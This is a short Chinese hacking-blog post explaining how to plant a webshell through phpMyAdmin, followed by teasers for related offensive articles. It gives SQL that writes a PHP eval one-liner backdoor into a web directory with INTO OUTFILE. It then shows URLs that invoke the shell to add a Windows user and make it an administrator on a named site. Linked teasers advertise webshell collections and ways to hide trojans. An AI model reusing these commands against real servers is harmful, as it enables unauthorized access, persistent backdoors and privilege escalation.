利用phpMyAdmin拿webshell

hacker5年前黑客文章680

首先用暴路径漏洞找到绝对路径,然后替换下面的路径

随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell)

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘D:\www\dmtz\bbs\upload\phpmyadmin\eval.php‘;
Drop TABLE IF EXISTS a;

这是我们的后门

http://chncto.com/phpmyadmin/eval.php

加个系统帐号
http://chncto.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://chncto.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add

标签: 黑客技术

相关文章

Linux网络黑客系统软件

Linux网络黑客系统软件

留意:全部这种专用工具全是捆缚在一起的Linux发行版,如Kali Linux或BackBox,因此大家一定会建议安裝一个适合的Linux网络黑客系统软件,使您的日常生活更轻轻松松 - 特别是在是由...

另类隐藏保护asp大马地址方法

另类隐藏保护asp大马地址方法

我们首先以一个大马为例这个大马是没有密码的,只要知道地址就可以进去了 或者你的大马有密码但是被人为添加了后门,但比较隐秘,完全清除很难,我们就可以用下列方法来进行处理。 如何加...

PHP一句话木马全集

PHP一句话木马全集

因为PHP一句话木马可以说有很多,简易的、中等水平的、繁杂的.......,今日主要是共享一些较为强大的一些PHP一句话木马全集;   一、运用404错误页掩藏PHP小龙 <!DOC...

程序开发“网络投票机”教程

程序开发“网络投票机”教程

我们在第二课立即用指令: sqlmap.py -u http://localhost/book/admin/lyedit.php?ly_id=2 -p ly_id 获得了后台管理管员的登录名和登陆密...

镜像劫持、网马详细介绍

镜像劫持、网马详细介绍

今日,有一位网民问了我一个难题,他自己早已拥有网址了,如今他想制成“镜像劫持”这类网址,要是开启它,电脑上就会有将会感柒木马程序。   木马病毒是必须开启才有实际效果的,开启标准:要不蒙骗...

黑客常用的DOS命令

一,ping        它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的...